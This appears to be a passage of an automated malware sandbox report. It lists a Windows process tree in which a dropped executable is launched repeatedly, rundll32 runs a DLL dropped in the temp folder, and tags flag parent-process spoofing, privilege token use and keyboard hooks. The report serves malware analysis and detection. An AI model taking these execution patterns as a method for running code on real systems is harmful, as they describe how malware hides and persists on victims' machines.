C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 284⤵
- Drops file in Program Files directory
- Program crash
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12460 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
-
C:\Users\Admin\Documents\U0zKDM0y1pVnqxjsOi3SDxEd.exe"C:\Users\Admin\Documents\U0zKDM0y1pVnqxjsOi3SDxEd.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Hj5Kn3mRnEpDSSdr268Dcs8R.exe"C:\Users\Admin\Documents\Hj5Kn3mRnEpDSSdr268Dcs8R.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3928 -ip 39281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1388 -ip 13881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2108 -ip 21081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 340 -ip 3401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 668 -ip 6681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1612 -ip 16121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5960 -ip 59601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2544 -ip 25441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 132 -ip 1321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4064 -ip 40641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 5808 -ip 58081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4968 -ip 49681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3052 -ip 30521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6CFE.exeC:\Users\Admin\AppData\Local\Temp\6CFE.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2368 -ip 23681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
